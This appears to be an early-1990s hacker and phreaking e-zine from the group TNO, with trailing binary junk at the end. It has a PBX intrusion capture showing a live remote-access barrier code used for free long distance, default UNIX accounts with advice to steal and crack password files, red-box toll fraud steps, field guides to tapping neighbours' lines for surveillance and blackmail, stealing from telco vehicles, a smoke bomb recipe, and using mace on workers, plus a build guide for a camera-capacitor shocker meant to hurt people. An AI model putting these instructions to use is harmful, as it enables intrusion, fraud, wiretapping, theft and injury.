display trunk-group 9                                             Page  1 of  5

                                

                                TRUNK GROUP



Group Number: 9                    Group Type: co            SMDR Reports? y

  Group Name: fax wild line               COR: 1                      TAC: 79

   Direction: two-way        Outgoing Display? n         Data Restriction? n

 Dial Access? y                Busy Threshold: 60           Night Service: 299

Queue Length: 0                                      Incoming Destination: 267

   Comm Type: voice                                 Digit Absorption List:

    Prefix-1? n                   Restriction: code



TRUNK PARAMETERS

            Trunk Type: loop-start

    Outgoing Dial Type: tone

     Trunk Termination: rc                    Disconnect Timing(msec): 500

        ACA Assignment? n

                                                    Maintenance Tests? y

 Answer Supervision Timeout:                    Suppress # Outpulsing? <

display trunk-group 9

  Command aborted

____________________________________________________________________________

[everything's great!]

 

 enter command: logoff

[Sooooooooo.....We logoff...]

[To use yer PBX, just dial in, and type:

  <YER CODE>+9+1+ACN!!

  Or to set up an alliance, replace the 1 with a 0...]





THE SECOND HACK

~~~~~~~~~~~~~~~

[I started this capture a little late, after I had already looked through

a few things.  It still gets the point across, tho.  It displays going

thru, and not changing ANYTHING!]





 enter command: dis rem

[I look at the remote...]

____________________________________________________________________________

display remote-access                                             Page  1 of  1



                                REMOTE ACCESS

               

               Remote Access Extension: 599

                   Barrier Code Length: 5

           Authorization Code Required? n



BARRIER CODE ASSIGNMENTS (Enter up to 10)

        Barrier Code    COR COS                Barrier Code    COR COS

     1: 52290           1   1                6:                 1   1

     2: 11111           1   1                7:                 1   1

     3:                 1   1                8:                 1   1

     4:                 1   1                9:                 1   1

     5:                 1   1               10:                 1   1



____________________________________________________________________________

[I see that there are 2 codes and an extension already set up.  I am wary 

of code number 2..It could be a trap code]

 



 enter command: dis trunk 7

____________________________________________________________________________

display trunk-group 7                                             Page  1 of  9



                                TRUNK GROUP



Group Number: 7                   Group Type: co            SMDR Reports? y

  Group Name: REMOTE ACCESS              COR: 63                     TAC: 707

   Direction: two-way       Outgoing Display? n

 Dial Access? y               Busy Threshold: 10           Night Service: 599

Queue Length: 0                                     Incoming Destination: 0

   Comm Type: voice                Auth Code? n    Digit Absorption List:

    Prefix-1? n                  Restriction: code

                                 Trunk Flash? n

TRUNK PARAMETERS

            Trunk Type:   ground-start

    Outgoing Dial Type: tone

     Trunk Termination: rc                    Disconnect Timing(msec): 500

     Terminal Balanced? n                               RA Trunk Loss: 0db

 Answer Supervision Timeout: 10            Receive Answer Supervision? <

display trunk-group 7

  Command aborted

____________________________________________________________________________

[I see that trunk 7 already has the extension ready to use!!!!!!!!]

[FREE LD and no changes!  They will not know I was ever there!!!]

[I look at page's 2 and 3 for the fone numbers to dial in to, and then

I'm OUTTA THERE!!!]



 enter command: logoff



    --I hope these captures helped..

              --Panther Modern TNO/TBF





<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>









                    /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\

                   *|     The TNO Hacking Crew Presents   |*

                   *|                                     |*

                   *|            UNiX Defaults            |*

                    \                                     /

                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





INTRO

~~~~~

This is a list compiled by the members of The New Order from frequent visits to

UNiX hosts.  These are default accounts/passwords observed in hosts running

UNiX variations including System V, BSD, Xenix, and AiX.  These defaults are

included in standard setup on various machines so the Sysadmin can log on

for the first time.  Often the negligent Sysadmin forgets to delete or pass-

word the accounts.  This makes UNiX machines extremely easy to infiltrate.

This article does not go into specifics of hacking but it is highly

suggested that you immediately copy the /etc/passwd file (/etc/security/

passwd in AiX machines!) so you can later run a dictionary hacker and get

some other accounts and ensure your access.  This is a list of default

accounts which are often unpassworded.  If the system asks for a password,

try t  he account name which sometimes works.





DEFAULTS

~~~~~~~~

root                         bin                     adm

makefsys                     sysadm                  sys

mountfsys                    rje                     sync

umountfsys                   tty                     nobody

checkfsys                    somebody                setup

lp                           powerdown               ingres

dptp                         general                 guest

daemon                       gsa                     user

trouble                      games                   help

nuucp                        public                  unix

uucp                         test                    admin

student                      standard                pub

field                        demo                    batch

visitor                      listen                  network

uuhelp                       usenet                  sysinfo

cron                         console                 sysbin

who                          root2                   startup

shutdown                     ncrm                    new





CONCLUSION

~~~~~~~~~~

Have phun but be careful!  Learn what to do before you run out and invade

some systems.  These won't do you any good if you can't hide your tracks.

Hacking is all about learning about cool stuff, but you can't hack until 

you learn how.  Njoy.





<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>







                            HoW To MAiL FoR FREE

                                 BY KARB0N

                                  -=TNO=-





        Postal chiselers used to mail letters unstamped in the knowledge 

that they would be delivered anyway... with "Postage Due" to the recipient.

It took a stingy person to mail personal letters this way, but many people 

did send mail this way on bill payments. So the Post Office changed its 

policy. It stopped delivering letters without stamps. But a letter with a

s  tamp.. even a one cent stamp...is delivered postage due if need be. A letter

with no stamp is returned to the sender.



        Naturally, this has just opened up a new way of cheating. Letters can

now be mailed for free by switching the positions of the delivery address and

the return address. If there is no stamp on the envelope, it will be Returned

to the address in the upper left corner.. which is where you want it to go in

the first place. Unlike the old system, the letter is not postage-due. At

most the recipient gets a stamped purple reminder that "The Post Office does

not deliver mail without postage."



        At least one large company seems to have adapted this principle to 

its billing. Citibank bases its MasterCard operations in Sioux Falls, South

Dakota. The bill payment envelopes have the Citibank Sioux Falls address in

both the delivery address and return address positions. (Most bill payments

envelopes have three lines for the customer to write in his or her return
  
address.) Therefore, regardless of whether the customer puts a stamp on the

envelope, it is delivered to Citibank. (The return-address gimmick works even

when the return address is in a different state from the mailing point.)



        Who is cheating whom? If the customer puts correct postage on the

envelope, it is delivered to Sioux Falls at the customer's expense. No one

is slighted. If, on the other hand, the customer intentionally omits the

stamp, the payment is delivered at Post Office expense. Then the customer has

cheated the Post Office. The Post Office also loses out if the customer

honestly forgets to put a stamp on the envelope. But then blame ought to be 

shared with the peculiar design of Citibank's envelope.



        Citibank's motive is plain: If the envelopes are returned to forgetful

customers, it delays payment.





<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>









                    (*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)\

                      (*)                                 (*)\|

                    (*)           |>ead|<at             (*)\|

                    (*)            presents             (*)\|

                    (*)                                 (*)\|

                    (*)         HOW TO RED BOX          (*)\|

                    (*)                                 (*)\|

                    (*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)\|

                     \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\|





INTRO

^^^^^

Red boxing has quickly become Colorado's elite game of choice.  Ever since

I dug up the 2600 plans and passed them out, it seems like every phreak in 

Colorado has built one.  Many questions, though, have arisen.  To hopefully

cut down on my e-mail, I present here the complete guide to using red boxes.





CHOOSING A PAY PHONE

^^^^^^^^^^^^^^^^^^^^

This is the simplest part of red boxing.  You must use an authentic U.S. 

West (or other Baby Bell) payphone.  If the phone does not say U.S. West

or have the bell symbol somewhere on it, it is a COCOT and cannot be boxed.





LONG DISTANCE

^^^^^^^^^^^^^

The most common reason for building a red box is of course to make long

distance calls.  This is also the easiest way to use them.  To make the 

call just dial:



                      1 + Area Code + Number



You will then hear a computer voice ask you to deposit an amount of money.

Make the quarter tones until you hear the voice say "Thank you".





LONG DISTANCE WITHIN AN AREA CODE

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

This is a little bit trickier.  Normally, U.S. West handles any calls within 

an area code.  Unfortunately, U.S. West switching systems are not fooled by

red box tones.  To get around this inconvenience, you must route your call

through a long distance carrier.  You must first decide which carrier you 

want to skam.  Here is a list of some of the major carriers available in

Colorado and their equal access codes.



AT&T         10288 or 10732

MCI          10222 or 10888 or 10789

Sprint       10333

Metromedia   10488 or 10999

Encore       10805 or 10555

Allnet       10444

Tel. Xpress  10465

ACI          10244

U.S. Tel.    10471

LDDS         10001

One 2 One    10390



To make the call dial:



                    Access Code + 1 + Area Code + Number



Once again you will be told to deposit money, feed 'em the quarter tones.





LOCAL

^^^^^

To make a local call, you must also route the call through a long distance

carrier.  To make the call, dial:



                          Access Code + Number



Thats it!  You will be told to deposit money as usual so unleash the tones.

                       



DURING THE CALL

^^^^^^^^^^^^^^^

If your call is over five minutes, you will hear a click at that time.  This

means you have spent all your money and are running on credit.  Two minutes

later you will be cut off temporarily and you will hear the computer ask you

for some mo  re money.  Deposit tones until you hear the voice say "Thank you".

Remember, the party you are calling will here the tones as well.  After you

have "paid" you will be reconnected to your party.





AFTER THE CALL

^^^^^^^^^^^^^^

When you are done, push the receiver down for a few seconds then let off and 

listen.  If you went over your time, the computer voice will come on and ask 

you to pay the amount you went over.  Pay with tones as usual.  If you just

hang up, the phone will ring and there will be an operator on the other end

asking for money.  Don't use the red box if you are talking to an operator.

Either pay with real money or take off.





CONCLUSION

^^^^^^^^^^

Red boxing is phun and easy as long as you know what you are doing.  Memorize

those access codes (or at least one) and you will be good to go.  I have 

been red boxing for quite a while now and have never had any problems nor 

have any of my receiving parties ever been harassed by the Gestapo.  If you

don't have the plans, call your local P/H BBS or contact somebody in TNO or

leave me mail on Flatline.

__________________________________________________________________________

(C)opywrong 1993, DeadKat Inc.

All wrongs denied.





<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>

                               





(Editor's note:  The following two files are the best files I have ever read

 on field phreaking.  They were written by Denver Hackers a few years ago.

 Since they were not widely distributed I have included them here for your

 information.  Unfortunately we were not able to contact the original authors

 to get permission to reprint them.  As far as we know, The Third Cartel is

 defunct.  If any previous members of the group read this publication, we

 ask that they get in contact with us at Flatline.)

                               



                               -/\-/*\-/\-/*\-/\-

                                  The Third Cartel

                               -\/-\*/-\/-\*/-\/-

 

                                   Presents:

  

                               Field Phreaking I

                              -=-=-=-=-=-=-=-=-=-

                                  June,  1988

 

Introduction:  The purpose of this manuscript is to introduce useful phreaking

-------------  techniques.  These techniques have been developed by the Third

Cartel and have proved to be convenient and reliable.  

 

Field Phreaking Kit:  

====================

 

The Field Phreaking Kit is a necessity for the serious phreaker.  Some 

so-called phreaks get all of their information including codes from BBSs and

have an ego big enough to call themselves phreaks.  The real phreak acquires

knowledge on his own through perseverance and ingenuity.  Following is a list 

of useful items for your Phreaking Kit:

 

o  Backpack:  Get one:  Very Handy.  We'll tell you how to get one or make one.

o  Ratchet Set:  Usually, you'll only need 7/16 and 3/8" size ratchets.

o  Screwdrivers:  Get medium and large screwdrivers, and a phillips head.

o  Wire Cutters:  Just in case you want to wipe out some lines.

o  Pliers:  For misc. stuff.

o  Xacto or Pocket Knife:  To strip or cut wires.

o  Penlight:  Nice and small; very useful for night work.

o  Flashlight:  If you need lots of light and have enough room in your pack.

o  Gloves:  Make sure you don't get shocked or leave your fingerprints around.

o  Pencil and Paper:  Write down locations, notes, numbers, etc.



------------------------------------------------------------------------------

 The Third Cartel carries the following optional materials in their Field Kit:

-------------------------------------------------------------------------------

o  Walkie-Talkies:  For communications when yelling isn't possible or smart.

o  Battery Operated Camara Flash:  Good for flashing in someone's eyes at night

                                   Will blind a telco guy for a f  ew seconds.

o  Mace/Dog Repellant:  Spray in someone's eyes if they give you trouble.

o  Smoke Bomb:  Helpful to divert attention or scare. [drop in telco car]

                [Mix 3 parts potassium nitrate with 2 parts sugar and melt]

o  Matches:  For smoke bomb or anything that is flammable.

o  Bandana/Surgical Mask:  Manholes are dusty; Wear these for easier breathing.

o  Marker:  Mark your "territory" on phone boxes.

o  Fake Telco ID Card:  Will make some people think that you work for telco.

 

Organize your kit so you know where everything is and can get something quickly

when needed.  You don't want to be fumbling for your mace when the gestapo is 

about to get you.

 

Test Phone:

===========

 

The Test Phone is the most useful piece of equipment for Field Phreaking.  You 

can try to sneak into a telco Plant Department [truckyard] and get a real test 

phone out of a truck like we did.  If you'd rather not do this, don't worry; 

making your own test phone is ultra-easy.

 

First, ge  t a telephone for your own purposes.  Find the wire coming out of the

phone that is supposed to go to the wall's modular jack.  It should be at least

three feet long for convienience.  Cut off the modular jack at the end of the 

wire.  Strip the wire, and there should be two or four small  wires inside.  

Hook the two middle wires to alligator clips [preferably insulated]. You now 

have a test phone!  Very easy, indeed.  Now let's see if you hooked everything 

up ok.  First find your phone box.  It'll probably be on the outside of your 

house.  It's fairly small, and you might need the ratchet to open it up.  Once 

you get it open, you should see some screws.  These are the terminals for your 

phone line.  Hook the alligator clips to the two top terminals.  If your phone 

is ok, you should get a dial tone.  Once you know that your phone is working, 

a whole new world opens up to you!  You can hook the phone up to your 

neighbor's terminal and call long distance or ye  ll at the operator on their 

line.  Be careful, though.  You don't want to be talking to Sue in L.A. when 

your neighbors are home and awake.  If they pick up the phone when you're 

already on, you could get into serious trouble.  Of course, you could always 

listen in on them!  If you want, you can hook wires up to your neighbor's 

terminal and lead them to your house.  In case you didn't know, this is called 

Beige Boxing.  You can then hack computers on their line, call Dial-A-Prayer, 

etc.  Make sure to hide the wire well so that it won't be traced to your 

house!

 

Manholes:

=========

 

One way to get access to an abundance of phone lines is by getting into telco 

manholes.  You don't want to accidentally get in a sewer manhole, so the first 

thing to do is find the differences between sewer and telephone manholes.  If 

you have trouble with this, here's a few tips that might help:

o  Telco manhole covers are usually larger and heavier than other covers.

o  Telco manholes are scarce compared to sewer manholes.  So if there are

   a lot of checkered manhole covers in your area, those are probably sewer 

   manholes.  If there are only a handful of unmarked manhole covers in

   your area, those probably contain phone lines.

o  Go to your local telco Central Office [CO] and find out what the manhole 

   covers look like there.  Find manhole covers that look the same in other

   areas, and pick a convenient/safe manhole to explore.   

 

Getting into a manhole is a different story.  Here in the Denver area, it takes

at least three people to get a manhole cover off.  Hopefully it'll be easier

to do in your area.  To open the manhole, you'll probably need at least two

crowbars [You could try using a pickaxe].  Get a group together to open the 

manhole, using 2 or more people with crowbars to slide the cover off.  You 

might want to get a strong guy to push the manhole cover while the other people 

with crowbars support it.  If you know of a tool that was made specifically

for opening manholes, we'd appreciate it if you contacted us on some local 

Denver boards and told us about it.  Likewise, if you have a better system for 

opening manholes, we'd be grateful for the information.

 

Once you get the manhole cover off, shine a flashlight down to see if there's 

a ladder going to the bottom.  Try a different manhole if there's no ladder.  

If you want to go down a manhole, don't forget to wear a bandana or surgical 

mask over your mouth so that you don't choke on dust.  Also bring a flashlight 

so you can see what you're doing.  Many times, there'll be a few inches of 

water at the bottom, so you might also want to wear boots.

 

Down in the manhole, you might find some equipment or manuals.  Go ahead and

take them if you want; you deserve it!  There should be some very large ABS.  

The phone lines are inside these tubes.  Attached to this tubing there will 

be some short, wide plastic cylinders.  There'll be screws holding these 

cylinders    on to the tubing.  You'll need either a screwdriver or a ratchet 

to open a cylinder.  If you happen to get a cylinder open, congratulations!  

You now have access to countless phone lines!  We'll leave it to you to 

figure out what to do with all of those wires.  Surely you'll figure 

something out!  [snip, snip!]

 

Exploring Telco Building Sites:

===============================

 

One of the best ways to get information about telco is by going to a Central

Office near you, exploring the trucks in a Plant Department, or "visiting"

other telco buildings.  The phone company is careless in many ways.  They 

leave important, yet unshredded documents and computer printouts in their

open dumpsters.  Their cars, vans, and repair vehicles are almost always left 

unlocked.  Inside their vehicles one can usually find manuals, test phones,

computer cards [usually for mainframes, almost never for personal computers], 

nice tool sets, etc.!  It's almost as if they *want* to be ripped off!  They 

deserve ba  d treatment just for their negligence.  If possible, we like to be 

courteous to individual employees of telco.  Most employees are fairly amiable 

and don't deserve trouble.  It's the bureaucracy of telco that deserves to be 

manhandled.  Cheap practices such as monopolizing and the overpricing of 

services is the general reason why we phreaks do what we do with such 

determination.  On with the show.

 

Exploring Dumpsters:  Looking inside telco dumpsters is probably the easiest way 

to acquire useful information.  Typically, dumpsters will be found outside a

Central Office.

                                

                               

                               

                               -/\-/*\-/\-/*\-/\-

                                The Third Cartel

                               -\/-\*/-\/-\*/-\/-

 

                                   Presents:

                               

                              Field Phreaking II

                                -=-=-=-=-=-=-=-=-=-

                                  July,  1988

 

Introduction:  The purpose of this manuscript techniques have been developed 

by the Third Cartel and have proved to be convenient and reliable.  This 

manuscript is a continuation of Manuscript II: Field Phreaking.

 

Pay Phone Hacking:

==================

 

The safest way to get phreaking codes is by hacking them on a pay phone.  The

chances of getting caught are extremely remote, especially if you switch pay

phones every few minutes.  One problem with hacking codes is that when you find

a code by dialing it randomly, you often forget what code you dialed.  To

prevent this, we print out a sheet filled with 6-8 digit random codes on the

computer.  Then we start testing each of these codes off of a 950 number.  This

works great, especially since 950s are not charged!  Cross off each code on the

paper that doesn't work, and mark the ones that do work.  This technique takes

a lot of patience, but it's worth it if you have a terrible short-term memory.

 

Telco Boxes:

============

 

This is our prime focus in Manuscript III.  Every field phreaker worth his

weight in dung should at least know the basics about phone boxes.  There are so

many different types that we can only cover the major groups.  But once you

learn about a few boxes, it'll be easy to learn about others.  Be sure to

bring a test phone with you [see Manuscript II] so you can connect up to phone

lines.

 

Small Boxes:  Small telephone boxes typically contain 1 to 20 different phone

------------  lines.  They are usually in convenient and safe locations.  They

are easy to open, and can be closed quickly.

 

Home Boxes:  Unless you live in an apartment complex, your home box should be

very easy to locate.  It is a small box located on the side of your house;

usually a foot or two off the ground.  Many times it will be beige colored

and may require a ratchet [Usually 3/8"] to open.  If you have more than one

line in your house, your box will probably be fairly large and light gray.

You'll need a ratchet and a screwdriver to open a two-line box.  In the

one-line box there will be five terminals or screws.  The top two screws should

have red and green wires leading to them.  If you connect your test phone clips

to these screws, you'll be on the line.  Usually, the two screws below contain

the same phone line.  The very bottom screw, in the middle, is the ground.  In

the two-line boxes, you should be able to figure out how to hook up to the

lines rather easily.  They even have a modular plug jack that you can plug a

normal phone into.  There are also several terminals that you can hook the

clips up to.

 

Aluminum Multi-Line Boxes:  These boxes are usually found behind business

buildings and shopping centers.  Some condominium complexes also have these

boxes hooked up to walls on a few units.  Each box contains five or more phone

lines.  The boxes are rectangular and made of aluminum, are very easy to open

and close, and often say "Western Electric" on the front.  Once you get the box

open, you will see several pairs of terminals grouped diagonally.  Simply

attach your phone clips to a correct pair, and you'll be on a phone line.  Run

an ANI on the phone line to find its number.  If your phone happens to be

polarity sensitive, and you get no dial tone when hooked up to terminals,

reverse the alligator clips and you'll be on the line.

 

Small Distribution Boxes:  These boxes, usually either light green, or a very

dark green, are not very common, and can be found behind shopping centers,

houses, and other buildings.  You'll probably need the ratchet to open it,

and a knife to strip some wires.  The top of the box pulls off if you loosen

the screws enough.  Inside, there will be several wires.  Two different sizes

of wires are found in distribution boxes.  The larger wires lead to nearby

buildings.  The smaller wires lead to another distribution box where they are

spliced in.  These boxes take the most time to use because they have no 

terminals and you have to find the correct wire pairs.  It's easiest to find 

the large wire pairs, so start out with those.  Once you find a phone line, 

you might want to tape together or label the wire pair for future reference.  

Use the same procedure for the smaller wires.  If you find a good box, and 

are willing to take the time, these boxes can be very worthwhile!

 

Medium Boxes:  Medium boxes carry more lines than small boxes but are usually

-------------  found in somewhat risky locations.  Most of them require a

ratchet for access, and they usually open on a hinged door.

 

Medium Distribution Boxes:  These are identical to the small distribution

boxes, but carry far more phone lines.  Many times, after taking off the cover,

there will be a flat access plate you can open with a ratchet.  Use the same

procedure for this box as outlined in the small distribution box description.

 

  Flat Peg Boxes:  Flat Peg boxes are frequently found behind grocery stores,

shopettes, and other businesses.  Sometimes they can be found in an office

phone room or in the back halls of shopping malls.  They are typically big,

square boxes mounted to a wall and are opened by a handle on a hinged door.

Sometimes, they are mounted away from a building.  We've seen some that are

double sided and require a ratchet to open.  Inside, the terminals will be

grouped in approx. 10 X 3 inch columns.  The terminals are long flat pegs.

There are four terminals per row.  It is sometimes difficult to hook up to a

line since the terminals are so close together, but you'll get the hang of

it after a few tries.

 

Large Boxes:  These boxes sometimes contain hundreds of phone lines.  They are

------------  found along busy streets and in business areas or apartment

complexes.  You'll need a ratchet to open one.

 

Wire Box:  The wire box is about three feet tall and has two doors opened by

one latch.    The wires lead into long, plastic, rectangular grouping stations.

There should be a tool attached by two screws to the side of a door.  Connect

your phone clips to these screws.  Now connect the tool to a plastic grouping

station.  If you connect the tool correctly, you will be on a line.  

The bes contained in a single grouping station.

 

Terminal Boxes:  In our opinion, the terminal box is the king of boxes.  A

single box may contain up to eight hundred lines.  You can't miss these boxes

because of their size.  They stand at least four feet tall and have the

characteristic light green color of most boxes.  After opening a box, you will

see many red and white numbered terminal pairs on each side.  On the inside of

each door, there are two screws to connect your test phone to.  Leading out

from the screws is a double current alligator clip that can easily connect to

any pair of terminals.  This easy connection tool makes this the most

convenient box to use, and the most profitable.

 

Helpful Tips:  Now that you know how most major boxes work, you'll be able to

-------------  figure out how other boxes work.  By now we're sure you have

thought of some interesting things to do with boxes.  Here are some tips you

might find helpful.

 

The Perfect Box:  The most tedious step in field phreaking is finding "The

Perfect Box."  This box should be located away from streets and hidden from the

view of homes.  When working on this box, there should be no worry of being

caught or observed.  Finding this box might take quite a while, but don't give

up hope; it's well worth the time and effort.  Try looking around waterways

such as creeks, lakes, and ditches.  If you have easy access to wilderness

areas, such as the mountains, try looking for Perfect Boxes around there.

 

Beige Boxing:  We're not sure exactly who invented the beige box, but it can be

extremely useful for surveillance and blackmail purposes.  The only materials

you need for a beig  e box are two wires and your test phone.  Connect the wires

to the ring and tip of the line you want to tap.  Make sure your wires are

hidden, and lead them to your house or other location.  You then can connect

your phone to the wires and listen in on conversations or use their phone line

however you want.  Make sure that you don't use a boxed line when the victim

is likely to pick up his phone and hear you.

 

Safety Tips:

 

o  Well, first of all, be extremely careful when choosing a box to work on.

   Two of us got arrested for using the wrong box at the wrong time.  Make

   sure that nobody will see you when you're working on it, because you're

   putting your record at risk.  Of course, if you're under 18, you don't have

   to worry quite as much, but going to court is not K-Rad.

 

o  Try wearing gloves when working on phone lines.  You don't want to get

   shocked or leave fingerprints around.

 

o  If you ever open a box that has huge cables in it, it's probably a power

   box.  The power box is usually dark green and stands a few feet in height.

   Don't even think of messing with one unless you want to risk having a

   painful death.  If you absolutely *must* disconnect someone's power, then

   use *EXTREME* caution when disconnecting the cable.  Wear heavy duty gloves,

   make sure that you aren't wet, and don't use metal tools.

 

o  Always look for your boxes at day, and work on them at night.

 

o  Have a getaway bike or car ready in case of an emergency.

 

o  If anyone catches you, act cool and calm.  You don't want to say "uh, well,

   umm...well I was just uh...," because that makes you look suspicious.

   *Always* have a story ready *before* you start opening boxes!  This has

   saved us a couple of times.

 

o  You might want to incorporate your fake I.D. card into the scheme so people

   think that you work for the phone company.  Remember, this won't work on

   telco employees.  Only attempt to fool average citizens.  If they call the  

   cops or telco, take off.

 

   This concludes Manuscript III.  We described most of the major phone boxes

so that you'll be able to figure out how other boxes work.  





<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>







                        -=How to make a ZaPPeR GuN=-

                        -=By Panther Modern TNO/TBF=-





  The zapper gun is kinda like a commercial stun gun.  It is not as 

powerful, and is mainly used to piss people off, not to put them down.

It will scorch skin very painfully, if applied.  Total cost for it is

around $20-$25, and it is a fun thing to make if yer kinda bored.

  If you don't know what a capaciter is, read no further, go find out

what one is/what one looks like, then come back.  Anyway, materials

are:



--------------------------------------------------------------------

Qty           Description                        Approx price

----------------------------------------------------  ----------------

01       Disposable Fugi-Film FLASH camera        $15+TaX

01       Small-Mid radio shack projekt BoX        $2-$3 or so..

02       Dry wall nails                           10-20 cents

01       Radio Shack SPST Push Button             $1.50

01       1 Alkeline AA battery                    $0.50

--------------------------------------------------------------------

           This is to make a fairly nice version.

           For the raw, crappy version, all you

           need is the camera.  I won't even go

           into details on making it, you can 

           figure it out for yerself.

--------------------------------------------------------------------



  Okay.  Get the camera.  If you want, take some pictures.  ALL OF THEM, 

or none of them.  Cause if you don't take all, you'll ruin the film..

Now, when yer ready, first, rip off the cardboard.  You'll have a plastic

box.  Open it up, as well as you can.  Be very careful not to damage the

circuit board, wire  s, flash, etc.  Once it's open, discard the plastic

case, and the film.  Now, looking at the circuit board, one can see

a fairly empty space.  Rite in the middle of it, will be 2 small copper

"plates."  Soldier your button to this place.  YOu may also remove the

flash at this time, as it will be shortly rendered useless.  Also, you will

notice two protrusions of copper strip.  Pull 'em off, and MAKE SURE they 

aren't touching when you finish, cause it will ruin the gun.  Next, put 

the circuit board in the project box.  Drill one hole so you can see the 

LED.  THis will tell you when the gun is ready to FIRE!  (When the LED 

flashes).  Next, line up approx where you want your two tips.  Line up 

the capaciter with this.  Drill holes.  Next, drill one last hole where

you want the button.  Now, remove the generic AA battery in the camera, 

replace it with your hi-quality Alkeline AA battery.  Now, stick the nails

in, and soldier them via wires to the two capaciter leads.  Seal them in

place with   either expoxy or hot glue.  Now, wire up your button, and stik

the LED in the hole you made for it.  CLose up the box.  Your gun is made..

Just push the button, holding down for apporx 2 seconds until the lite 

flashs, and touch whatever you want to SHOCK.  This gun is semi-lame, but

is also fun, and good for boredom..Have PhUn!!





<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>





            



                          Comments on Phrack 42

                               by Karb0n

                                -=TNO=-





Ok...I was reading a little of Phrack 42...in the first part of the issue I 

read this short post on turning traffic lights to green on your side....

I'm here to tell that fucker that you cannot do that anymore... Maybe where

he lives you can...but not in Colorado.....he must have had an old system.

Now i'm sure there are a few old lights around 303 that can still be used that

way but...the metro area is not possible....i'll explain:



There are three different ways to change a stoplight in your direction to 

green.



1) Manually Activated Devices:

Traffic control devices of this type operate by a switch that is manually held

until a Fire Engine or Ambulance clears the intersection. This switch can be 

set up on an automatic timer that interrupts traffic flow until the apparatus

responds, then turns the light cycle back to normal.



2) Siren Activated Devices:

The siren of the Apparatus or Police Unit activates this traffic control 

device. A sound pick-up unit is located at each MAJOR intersection. This unit

filters out all other noise except the siren and sends a signal to the traffic

light selector in the control box. The traffic light selector holds the 

yellow light for a few seconds (to let cross-traffic pass through) and then

switches to red..which flashes at double the normal rate.



A lot of people think their car horn will set some of these off....no! Not 

true!



3) Light Activ  ated Devices: (This is the one that d00d talked about in Phrack)

This type of traffic controll device is activated by a Pulseating, High-

Intensity Stobe light that sends a signal to a detector located at each major 

intersection. This dector holds the light green...if it happends to be green

when your going through it, or speeds up the normal cycle to green in the 

direction of travel...(note: This means there is a RED light on three sides 

and GREEN only on yours). There is an indicating light located next to the

light detector, assuring the driver that the traffic signal is in control

by the strobe light.



Ok...The name of the strobe light system is called an OPTICOM. The key word in

the upper paragraph was "HIGH-INTENSITY"...normal cars do not have high 

intensity lights...even when you put your brights on. The OPTICOM flashes at

over 14 times a second...it almost looks like a regular solid light..but nope.

If you guys don't know what i'm talking about...next time you see a Fire Truck

running with lights and siren...look at the top of the engine and you'll see 

it flashing away...actually..I think it's the most noticeable thing....



Note: Police cars do not have these on them....and only some Ambulances.

The reason Cops don't have them is because they have a car that is easier to

maneuver through other cars and intersections. But a fire engine..with a lot

of water and very heavy can't turn on a dime...you'll be screwed in a second!

So that's why Fire trucks have them and cops don't. Some ambulances do...so

keep an EYE out for it. 





                                        Karb0n -=TNO=-



   Greets-



                Cavalier: Have you come up for air yet?

                Dead Kat: Was I abducted?

         Nuklear Phusion: Dude... the Delphi died.

           



<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>





CONCLUSION

~~~~~~~~~~

     Well, that's it for our first issue.  The next ones should be a bit longer

and probably more technical.  We hope that you found this publication both

useful and interesting.  If you have the urge to write a text file, please 

contact us at Flatline.  The number is posted on many BBS's and many quality

hackers have the number too.  If you have any comments about this file, please

let us know.  We are more than open to suggestions on how to improve this 

'zine and would appreciate feedback.  Look for issue number 2 on a quality

BBS near you!





     DSET   |    ( H       n d  t                        <             
                             6    *                           <                    DSET   |    ( H             |                                                           @H          6    *                           <                        FNTM       H         	Helvetica                                                            Geneva                                                         CUTS    